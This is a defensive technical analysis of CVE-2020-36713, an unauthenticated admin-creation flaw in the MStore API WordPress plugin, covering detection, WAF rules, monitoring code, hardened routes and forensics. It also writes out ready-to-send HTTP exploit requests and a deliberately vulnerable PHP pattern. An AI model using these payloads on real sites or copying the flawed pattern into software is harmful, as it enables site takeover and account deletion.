CVE-2020-36713
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.1.5. This is due to unrestricted access to the 'register' and 'update_user_profile' routes. This makes it possible for unauthenticated attackers to create new administrator accounts, delete existing administrator accounts, or escalate privileges on any account.
Comprehensive Technical Analysis of CVE-2020-36713
MStore API Plugin for WordPress – Authentication Bypass Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Overview
CVE-2020-36713 is a critical authentication bypass vulnerability in the MStore API plugin for WordPress, affecting versions up to and including 2.1.5. The flaw arises from unrestricted access to sensitive API endpoints (register and update_user_profile), allowing unauthenticated attackers to:
- Create new administrator accounts
- Delete existing administrator accounts
- Escalate privileges of any user
Severity Metrics (CVSS v3.1)
| Metric | Value | Description |
|---|---|---|
| Base Score | 9.8 | Critical |
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Network-reachable, low complexity, no privileges, no user interaction, scope unchanged |
| Impact subscore | 5.9 | Full loss of confidentiality, integrity and availability (C:H/I:H/A:H) |
| Exploitability subscore | 3.9 | The maximum for this vector: one unauthenticated HTTP request, no special tooling |
Risk Assessment
- Exploitability: High (no credentials, no user interaction, a single crafted HTTP request)
- Impact: Severe (full administrative control of the WordPress site)
- Likelihood of Exploitation: High (one-request unauthenticated WordPress plugin flaws are routinely folded into automated scanning and exploitation tooling once details are public, so assume any exposed vulnerable install will be probed)
- Business Impact: Complete site takeover, data exfiltration, defacement, or malware deployment
2. Potential Attack Vectors and Exploitation Methods
Attack Surface
The vulnerability exists in the MStore API plugin, which exposes REST API endpoints so that a companion mobile app can talk to a WooCommerce-based WordPress site. The affected routes, as described on this page, are:
- /wp-json/mstore-api/v1/register (user registration)
- /wp-json/mstore-api/v1/update_user_profile (user profile modification)
Confirm the exact route paths and parameter names against the register_rest_route() calls in the installed plugin version before using them in detection or blocking rules; the examples below use the names above. Note also that WordPress serves every REST route through a second URL form, /index.php?rest_route=/mstore-api/v1/register, which reaches the same code and must be covered by any path-based control.
Exploitation Steps
Method 1: Unauthenticated Administrator Account Creation
- Reconnaissance:
  - Identify a WordPress site running a vulnerable MStore API version (≤ 2.1.5), e.g. from the version header of the plugin under wp-content/plugins/mstore-api/ or from a plugin scanner.
  - Confirm the route is reachable without credentials:
    GET /wp-json/mstore-api/v1/register
- Exploitation:
  - Send a POST request to /wp-json/mstore-api/v1/register with a crafted body:
    ```json
    {
      "username": "attacker_admin",
      "email": "attacker@example.com",
      "password": "StrongPassword123!",
      "role": "administrator"
    }
    ```
  - The plugin performs no authentication or capability check and passes the caller-supplied role through, so the new account is created as an administrator.
- Post-Exploitation:
  - Log in via /wp-admin with the new account.
  - Full control of the site follows (plugin/theme installation, which amounts to arbitrary PHP upload; database access through installed tools; file uploads).
Method 2: Privilege Escalation of Existing Users
- Target Identification:
  - Enumerate existing users via /wp-json/wp/v2/users (lists users with published content when the core REST API is not restricted) or guess low user IDs; user ID 1 is the account created at install time.
- Exploitation:
  - Send a POST request to /wp-json/mstore-api/v1/update_user_profile with:
    ```json
    {
      "user_id": 2,
      "role": "administrator"
    }
    ```
    user_id is the target account (for example, a subscriber). The plugin does not verify who is making the request, so the role change is applied.
- Post-Exploitation:
  - Log in as the escalated user. This requires that account's password, so in practice an attacker combines Method 1 and Method 2: create an account, then escalate it.
Method 3: Administrator Account Deletion
- Exploitation:
  - Send a POST request to /wp-json/mstore-api/v1/update_user_profile with:
    ```json
    {
      "user_id": 1,
      "delete": true
    }
    ```
    The plugin deletes the targeted administrator without any authentication check; this locks out legitimate operators and destroys evidence.
Exploit Availability
- Public Proof-of-Concept (PoC) Exploits:
  - Exploitation needs nothing beyond an HTTP client, so PoCs are trivial to write; check Exploit-DB, GitHub and the nuclei-templates repository for published ones.
  - Automated scanners (Nuclei, WPScan, Metasploit WordPress modules) commonly carry checks for unauthenticated WordPress plugin flaws of this kind.
- Active Exploitation:
  - Unauthenticated admin-creation flaws in WordPress plugins are a standard target of mass scanning campaigns; treat exposed vulnerable installs as already probed.
  - Typical follow-on use of a compromised site: SEO spam, malware distribution, phishing pages and credential harvesting.
3. Affected Systems and Software Versions
Vulnerable Software
- Plugin: MStore API (for WordPress)
- Affected Versions: ≤ 2.1.5
- Fixed Version: 2.1.6+ (released June 2023)
Dependencies
- WordPress Core: Any version (vulnerability is plugin-specific).
- WooCommerce: Not directly required, but MStore API is often used with WooCommerce for mobile app integration.
Detection Methods
- Manual Check:
  - Read the installed version:
    wp plugin get mstore-api --field=version
    (or wp plugin list | grep mstore-api; anything ≤ 2.1.5 is vulnerable)
  - Probe the route from outside:
    GET /wp-json/mstore-api/v1/register
    A JSON response other than a rest_no_route error shows the route exists and is reachable without credentials. Route presence alone does not prove the install is unpatched, since registration is a legitimate feature of the plugin; treat the probe as a triage signal and rely on the version check for the verdict.
- Automated Scanning:
  - WPScan (plugin enumeration against the WordPress vulnerability database; vulnerability data needs a WPScan API token):
    wpscan --url https://target.example --enumerate vp --api-token <token>
  - Nuclei template (illustrative; the matcher is the one given on this page, written in the current http: block syntax):
    ```yaml
    id: CVE-2020-36713

    info:
      name: MStore API Auth Bypass
      author: example
      severity: critical
      description: Checks for unauthenticated access to /wp-json/mstore-api/v1/register

    http:
      - method: GET
        path:
          - "{{BaseURL}}/wp-json/mstore-api/v1/register"
        matchers:
          - type: word
            words:
              - "username"
              - "email"
              - "password"
    ```
    The word matcher only shows that the route answered with field names; it cannot tell 2.1.5 from a patched build, so confirm with the version check before reporting.
  - Wordfence: its scanner flags installed plugins with known vulnerabilities, including this one.
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade the Plugin:
  - Update to MStore API 2.1.6 or later:
    wp plugin update mstore-api
  - Then verify the installed version; the update command succeeding is not the same as the fixed code being live:
    wp plugin get mstore-api --field=version
- Disable the Plugin (Temporary Workaround):
  - If patching is not immediately possible, deactivate it (this also disables the mobile app integration):
    wp plugin deactivate mstore-api
  - Deactivation removes the routes; the plugin files remain on disk, which is fine as long as the plugin stays inactive.
- Restrict API Access:
  - Block the plugin's routes at the web server. A FilesMatch directive does not work here: /wp-json/... is a rewrite handled by WordPress, not a file on disk, and FilesMatch matches file names only. Use mod_rewrite (in .htaccess, above the WordPress block) and cover the rest_route query-string form as well:
    ```apache
    RewriteEngine On
    RewriteCond %{REQUEST_URI} ^/wp-json/mstore-api/ [NC,OR]
    RewriteCond %{QUERY_STRING} rest_route=(/|%2F)mstore-api [NC]
    RewriteRule ^ - [F,L]
    ```
    nginx equivalent, inside the server block:
    ```nginx
    location ~* ^/wp-json/mstore-api/ { return 403; }
    if ($args ~* "rest_route=(/|%2F)mstore-api") { return 403; }
    ```
    This breaks the mobile app for everyone, so it is a stopgap until the plugin is patched. Both exposed routes are exploitable without credentials, so there is no subset of them that can safely stay open on a vulnerable build.
  - Rate limiting does not mitigate this issue: one request creates the administrator account. It remains useful against follow-on password brute-forcing, but do not rely on it as the control.
Long-Term Hardening
- Implement Web Application Firewall (WAF) Rules:
  - ModSecurity custom rules (local rules in the 1-99,999 ID range, not part of the OWASP CRS). Two rules are needed because WordPress also serves REST routes through the rest_route query parameter; ARGS_GET is available in phase 1, so the request can be denied before the body is read:
    ```apache
    SecRule REQUEST_URI "@beginsWith /wp-json/mstore-api/" \
        "id:1000,phase:1,deny,status:403,log,msg:'MStore API route blocked (CVE-2020-36713)'"
    SecRule ARGS_GET:rest_route "@beginsWith /mstore-api/" \
        "id:1001,phase:1,deny,status:403,log,msg:'MStore API route via rest_route blocked (CVE-2020-36713)'"
    ```
  - Cloudflare WAF custom rule: match the same two patterns (URI path starting with /wp-json/mstore-api/, or query string containing rest_route=/mstore-api/) and block. An edge WAF cannot see WordPress session state, so it cannot tell "unauthenticated" callers apart; block by path, and allow-list the app's traffic only if it arrives with a header or source the edge can verify.
- Monitor for Suspicious Activity:
  - Log and alert on:
    - POST requests to /wp-json/mstore-api/* or to index.php?rest_route=/mstore-api/* (access logs show the attempt, not the outcome).
    - New administrator account creations and role changes (wp_users.user_registered together with the <prefix>capabilities row in wp_usermeta shows the outcome; correlate with the request timestamps).
  - SIEM Integration:
    - Forward web server access logs and WordPress-side audit events to Splunk, ELK, or Graylog, and alert when an mstore-api POST is followed within seconds by a new administrator.
- Principle of Least Privilege:
  - Deny the REST API to unauthenticated callers if the site does not need it. This is the filter WordPress documents for that purpose; it must pass through any error it was handed before adding its own:
    ```php
    add_filter( 'rest_authentication_errors', function ( $result ) {
        // Another filter already decided (error or success): keep that result.
        if ( ! empty( $result ) ) {
            return $result;
        }
        if ( ! is_user_logged_in() ) {
            return new WP_Error(
                'rest_not_logged_in',
                'REST API restricted to authenticated users.',
                array( 'status' => 401 )
            );
        }
        return $result;
    } );
    ```
    Caveat: the MStore API exists so that an unauthenticated mobile app can log in and register, so this filter disables the app along with the vulnerability. Other plugins that call the REST API from the public site (contact forms, for example) break as well, so test before deploying.
- Regular Vulnerability Scanning:
  - Use WPScan, Nessus, or OpenVAS to detect outdated plugins.
  - Schedule automated patch management for WordPress and plugins.
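The monitoring bullets above (alerting on mstore-api requests, and on new administrators, role changes and deletions) can be implemented inside WordPress itself, which is the only place the outcome of a request is visible. The following is an added example written for this page, not code from the MStore API plugin or from WordPress core. It assumes the mstore-api route namespace described on this page and writes to PHP's error log via error_log(), which on most hosts lands in the web server error log where a SIEM agent can collect it.

```php
<?php
/**
 * Plugin Name: MStore API exploitation monitor (added illustrative example)
 *
 * Drop this file into wp-content/mu-plugins/ and it loads on every request.
 * It emits one JSON log line per event of interest. The 'mstore-api' route
 * prefix is taken from this page and is an assumption about the plugin.
 */

function mstore_monitor_log( $event, array $fields ) {
    $fields['event'] = $event;
    $fields['ip']    = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-';
    $fields['actor'] = get_current_user_id();   // 0 means the caller was unauthenticated
    $fields['ts']    = gmdate( 'c' );
    error_log( 'MSTORE_MONITOR ' . wp_json_encode( $fields ) );
}

// 1. Any REST call that lands in the plugin's namespace. This filter runs after
//    WordPress has authenticated the request and for both URL forms
//    (/wp-json/... and index.php?rest_route=...), so unlike a path-based WAF
//    rule it cannot be sidestepped by changing the URL style.
add_filter( 'rest_request_before_callbacks', function ( $response, $handler, $request ) {
    $route = $request->get_route();               // e.g. "/mstore-api/v1/register"
    if ( 0 === strpos( $route, '/mstore-api/' ) ) {
        mstore_monitor_log( 'mstore_api_request', array(
            'method'        => $request->get_method(),
            'route'         => $route,
            'authenticated' => is_user_logged_in(),
            // Log parameter names only: the body of a register call holds a password.
            'params'        => array_keys( (array) $request->get_params() ),
        ) );
    }
    return $response;
}, 10, 3 );

// 2. Account creation, with the roles the account was created holding.
//    wp_insert_user() sets the role before firing user_register, so the
//    roles array already reflects any caller-supplied 'role'.
add_action( 'user_register', function ( $user_id ) {
    $user = get_userdata( $user_id );
    mstore_monitor_log( 'user_created', array(
        'user_id' => $user_id,
        'login'   => $user ? $user->user_login : '?',
        'roles'   => $user ? $user->roles : array(),
    ) );
} );

// 3. Role changes. set_user_role fires from WP_User::set_role(), which is the
//    path wp_update_user() takes when 'role' is present in its arguments.
add_action( 'set_user_role', function ( $user_id, $new_role, $old_roles ) {
    mstore_monitor_log( 'role_changed', array(
        'severity' => ( 'administrator' === $new_role ) ? 'HIGH' : 'INFO',
        'user_id'  => $user_id,
        'from'     => $old_roles,
        'to'       => $new_role,
    ) );
}, 10, 3 );

// 4. Deletions, fired by wp_delete_user() before the rows are removed.
add_action( 'delete_user', function ( $user_id ) {
    mstore_monitor_log( 'user_deleted', array( 'user_id' => $user_id ) );
} );
```

The useful SIEM rule on top of these lines is a correlation, not a single match: an mstore_api_request with authenticated=false followed within a few seconds by a user_created or role_changed event whose roles include administrator is the exploit in progress. Logging only parameter names keeps plaintext passwords out of the log.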
5. Impact on the Cybersecurity Landscape
Threat Landscape Implications
- Mass Exploitation Potential:
- Low-skill attackers can leverage public PoCs to compromise thousands of WordPress sites.
- Commodity botnets and mass-exploitation kits routinely fold one-request WordPress flaws into their scanners and use the compromised sites for spam hosting, malware distribution or as attack infrastructure.
- Supply Chain Risks:
- MStore API is used in mobile app integrations for WooCommerce stores, increasing the attack surface for e-commerce sites.
- Third-party developers may unknowingly distribute vulnerable versions in custom apps.
- Regulatory and Compliance Risks:
- GDPR, PCI DSS, HIPAA: Unauthorized admin access may lead to data breaches, triggering legal penalties.
- Incident Response Costs: Organizations may face forensic investigations, customer notifications, and reputational damage.
Historical Context
- Similar Vulnerabilities:
  - CVE-2021-24370 (Fancy Product Designer for WordPress: unauthenticated arbitrary file upload, another plugin route reachable without credentials that led to site takeover)
  - CVE-2017-8295 (WordPress core: password-reset e-mail Host header poisoning, which let an attacker redirect reset links)
- Trends:
  - The large majority of WordPress CVEs are in third-party plugins rather than core, and outdated plugins are common on production sites.
  - Shift toward API-based attacks: REST routes registered by plugins, frequently without an effective permission_callback, are a growing attack vector.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from missing authentication and capability checks in the MStore API plugin's REST endpoints. The snippets below are an illustrative reconstruction of the flawed pattern, not the plugin's source; route and parameter names follow this page's description.
- register Endpoint:
  - Expected Behavior: Only allow registration when the site permits it (e.g., customer sign-ups), and never let the caller choose a role.
  - Actual Behavior: No authentication or capability checks, and the caller-supplied role is honoured, so anyone can register as an administrator.
  - Code Snippet (vulnerable pattern):
    ```php
    public function register() {
        // The whole decoded body goes straight to wp_insert_user(), which
        // honours a caller-supplied 'role' along with every other user field.
        $user_data = json_decode( file_get_contents( 'php://input' ), true );
        $user_id   = wp_insert_user( $user_data );                 // no role validation
        // Redundant after the line above, but makes the privilege grant explicit.
        wp_update_user( array( 'ID' => $user_id, 'role' => $user_data['role'] ) );
    }
    ```
- update_user_profile Endpoint:
  - Expected Behavior: Restrict to authenticated users; let a user edit only their own profile; require the edit_users capability (and delete_users for deletion) to touch anyone else; never accept a role or a delete flag from an unprivileged caller.
  - Actual Behavior: No authentication or capability checks, allowing unauthenticated privilege escalation and deletion of any user ID.
  - Code Snippet (vulnerable pattern):
    ```php
    public function update_user_profile() {
        $data = json_decode( file_get_contents( 'php://input' ), true );
        if ( isset( $data['delete'] ) ) {
            wp_delete_user( $data['user_id'] );                      // no authentication check
        } else {
            wp_update_user( array( 'ID' => $data['user_id'], 'role' => $data['role'] ) ); // unrestricted role change
        }
    }
    ```
In WordPress REST terms the underlying mistake is the same for both: the route is registered without an effective permission_callback, so WordPress dispatches the handler for any caller, and the handler itself trusts the request body for the role and the target user ID.
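The hardened form of the same two routes, written as an added example for this page rather than taken from the plugin or from its 2.1.6 fix, which may differ. It assumes the mstore-api/v1 namespace and the username, email, password and user_id parameter names used above. The fix lives in the route registration, not only in the handler: WordPress runs permission_callback before the handler and answers 401 or 403 when it returns false, and the handlers never hand the raw request body to wp_insert_user() or wp_update_user().

```php
<?php
/**
 * Added illustrative example (not the MStore API plugin's code): hardened
 * registration of the two routes discussed on this page. Route namespace,
 * route names and parameter names are assumptions taken from the page.
 */

add_action( 'rest_api_init', function () {

    // Public self-registration: reachable by anyone, but the caller can never
    // choose a role, and the route is refused outright when the site has
    // open registration switched off (Settings > General > "Anyone can register").
    register_rest_route( 'mstore-api/v1', '/register', array(
        'methods'             => 'POST',
        'callback'            => 'hardened_mstore_register',
        'permission_callback' => function () {
            return (bool) get_option( 'users_can_register' );
        },
        'args' => array(
            'username' => array( 'required' => true, 'type' => 'string', 'sanitize_callback' => 'sanitize_user' ),
            'email'    => array( 'required' => true, 'type' => 'string', 'format' => 'email' ),
            'password' => array( 'required' => true, 'type' => 'string' ),
        ),
    ) );

    // Profile updates: require an authenticated caller. A user may edit only
    // their own profile; editing anyone else needs the edit_user meta
    // capability (mapped to edit_users), and even then the role is not
    // reachable through this route.
    register_rest_route( 'mstore-api/v1', '/update_user_profile', array(
        'methods'             => 'POST',
        'callback'            => 'hardened_mstore_update_profile',
        'permission_callback' => function ( WP_REST_Request $request ) {
            $target = (int) $request->get_param( 'user_id' );
            return is_user_logged_in()
                && ( $target === get_current_user_id() || current_user_can( 'edit_user', $target ) );
        },
        'args' => array(
            'user_id' => array( 'required' => true, 'type' => 'integer' ),
        ),
    ) );
} );

function hardened_mstore_register( WP_REST_Request $request ) {
    // Build the user record field by field: the decoded body is never passed
    // to wp_insert_user(), so a caller-supplied 'role' is simply ignored.
    $user_id = wp_insert_user( array(
        'user_login' => $request['username'],
        'user_email' => $request['email'],
        'user_pass'  => $request['password'],
        'role'       => get_option( 'default_role', 'subscriber' ),
    ) );
    if ( is_wp_error( $user_id ) ) {
        return new WP_Error( 'registration_failed', $user_id->get_error_message(), array( 'status' => 400 ) );
    }
    return rest_ensure_response( array( 'id' => $user_id ) );
}

function hardened_mstore_update_profile( WP_REST_Request $request ) {
    $user_id = (int) $request['user_id'];

    // Explicit allow-list of harmless profile fields. 'role', 'delete' and
    // anything else present in the body is dropped rather than forwarded.
    $allowed = array( 'first_name', 'last_name', 'display_name', 'description' );
    $update  = array( 'ID' => $user_id );
    foreach ( $allowed as $field ) {
        if ( null !== $request->get_param( $field ) ) {
            $update[ $field ] = sanitize_text_field( $request->get_param( $field ) );
        }
    }

    $result = wp_update_user( $update );
    if ( is_wp_error( $result ) ) {
        return new WP_Error( 'update_failed', $result->get_error_message(), array( 'status' => 400 ) );
    }
    return rest_ensure_response( array( 'id' => $user_id, 'updated' => array_keys( $update ) ) );
}
```

Note on is_user_logged_in() in a REST context: it is true only when the request carries cookie authentication with a valid X-WP-Nonce header, an application password, or a token that a determine_current_user filter (such as one the plugin itself adds for its mobile app) resolves to a user. Whatever the app's login scheme is, the permission_callback is the place that must depend on it; a handler that reads php://input directly sees none of it. Deletion is deliberately absent from the hardened route: if the app needs it, it belongs behind its own route with a delete_users capability check.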
Exploit Payload Examples
All three use the route paths described on this page; the Host and the user IDs are placeholders. JSON does not permit comments, so the annotations are kept out of the bodies.
1. Creating an Admin Account
```http
POST /wp-json/mstore-api/v1/register HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/json

{
  "username": "hacker_admin",
  "email": "hacker@evil.com",
  "password": "P@ssw0rd123!",
  "role": "administrator"
}
```
2. Escalating a Subscriber to Admin (user_id 5 is the target subscriber)
```http
POST /wp-json/mstore-api/v1/update_user_profile HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/json

{
  "user_id": 5,
  "role": "administrator"
}
```
3. Deleting the Default Admin (user_id 1 is the account created at install time)
```http
POST /wp-json/mstore-api/v1/update_user_profile HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/json

{
  "user_id": 1,
  "delete": true
}
```
Forensic Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
| Log Entry | POST /wp-json/mstore-api/v1/register or .../update_user_profile, or POST /index.php?rest_route=/mstore-api/v1/...; an access log does not record authentication state, so treat every such POST that is not from the app's known clients as suspect |
| User Creation | New accounts in wp_users holding the administrator role, with a user_registered timestamp that matches a logged mstore-api request; throwaway addresses (e.g., x@x.com) are a common tell |
| Privilege Changes | Sudden role changes in wp_usermeta (the <prefix>capabilities row going from subscriber to administrator) |
| Account Deletion | Administrator accounts missing from wp_users, with their content reassigned or gone |
| Plugin Version | Version header of the plugin under wp-content/plugins/mstore-api/ (or wp plugin list) showing ≤ 2.1.5; the file header, not the wp_options table, is the authoritative source |
| Network Traffic | Calls to the routes above from unfamiliar IPs or with user agents that are not the mobile app |
Detection and Response
- Log Analysis:
  - Search for POST requests to /wp-json/mstore-api/* and for rest_route=/mstore-api/ in the query string, in:
    - Apache/Nginx access logs (these do not record whether the caller was authenticated; any such POST from outside the app's known clients is suspect)
    - WordPress debug logs (wp-content/debug.log), if WP_DEBUG_LOG was enabled at the time
- Database Forensics (replace the wp_ prefix with the site's $table_prefix from wp-config.php; the capabilities meta_key carries the same prefix):
  - List every account holding the administrator role, newest first, so accounts created in the suspect window stand out:
    ```sql
    SELECT u.ID, u.user_login, u.user_email, u.user_registered
    FROM wp_users AS u
    JOIN wp_usermeta AS m ON m.user_id = u.ID
    WHERE m.meta_key = 'wp_capabilities'
      AND m.meta_value LIKE '%administrator%'
    ORDER BY u.user_registered DESC;
    ```
    Do not filter on user_email LIKE '%@%.%': that pattern matches every valid address and returns the whole table. Matching user_login LIKE '%admin%' catches only lazy attackers; the role join above is what matters.
  - Compare the wp_usermeta rows of a suspect account with those of a known-good account created through the normal flow; rows an ordinary registration always writes that are missing here are a further sign the account was created through the API.
- Host Forensics:
  - Review wp-content/uploads, the active theme, mu-plugins and plugin directories for PHP files with modification times in the suspect window (webshells and backdoors planted through the new admin account). Memory analysis with Volatility is rarely needed for a PHP site compromise; file-system and database review usually answer the question.
- Incident Response Steps:
  - Isolate the affected site (take it offline or restrict access to known IPs).
  - Remove the rogue administrator accounts and revert role changes, then patch or deactivate the plugin before the site goes back online; otherwise it is simply re-exploited.
  - Rotate all credentials (WordPress passwords, database, hosting, any API keys stored in wp_options) and regenerate the AUTH_KEY/SALT constants in wp-config.php, which invalidates every existing login cookie.
  - Restore from a backup taken before the first suspicious request if file-level tampering is found.
  - Hunt for persistence (WP-Cron entries, hidden admin accounts, modified core or plugin files, must-use plugins, scheduled actions).
Conclusion
CVE-2020-36713 represents a critical authentication bypass in the MStore API plugin, enabling full WordPress site takeover with a single unauthenticated request. Given its 9.8 CVSS score and how trivially it can be scripted, organizations running the plugin must prioritize patching, monitoring, and hardening.
Key Takeaways for Security Teams
✅ Patch immediately (upgrade to MStore API v2.1.6+).
✅ Monitor for exploitation attempts (WAF, SIEM, log analysis).
✅ Restrict API access (block or disable the unauthenticated routes until patched).
✅ Assume breach if a vulnerable version was exposed (forensic investigation recommended).
✅ Educate developers on secure API design (authentication via permission_callback, input validation, least privilege).
This vulnerability underscores the critical importance of proactive vulnerability management in WordPress environments, where third-party plugins remain a primary attack vector.